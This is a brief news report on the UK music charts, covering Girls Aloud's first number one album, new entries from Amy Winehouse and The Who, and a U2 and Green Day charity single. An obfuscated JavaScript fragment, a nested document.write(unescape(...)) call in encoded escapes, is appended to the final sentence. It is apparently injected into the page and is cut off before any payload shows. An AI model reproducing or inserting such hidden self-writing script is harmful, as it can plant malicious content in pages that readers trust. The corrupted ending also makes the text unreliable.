Girls Aloud scored their first number one album on Sunday, topping a run of 13 hit singles and three best-selling CDs report Reuters.
The five-girl group, created by a television talent show in 2002, went straight to the top of the album charts with their greatest hits compilation "The Sound Of Girls Aloud", the Official UK Charts Company said.
Soul singer Amy Winehouse saw her new album "Back To Black" debut at number three, while veteran rockers The Who entered the charts at nine with Pete Townshend and Roger Daltrey's "Endless Wire".
In the singles charts Dutch DJ Fedde Le Grand moved up to the top slot with "Put Your Hands Up For Detroit".
Irish rockers U2 and American band Green Day were the highest new entry at six with their charity cover of "The Saints Are Coming", originally recorded by punk band The Skids.
Proceeds from the single will go to Music Rising, a fund helping U.S. Gulf Coast musicians who lost equipment in Hurricanes Katrina and Rita.
Also new at number 11 were girl band All Saints with "Rock Steady", with Pete Doherty's Babyshambles in at number 17 with their cover of the Clash's "Janie Jones".document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
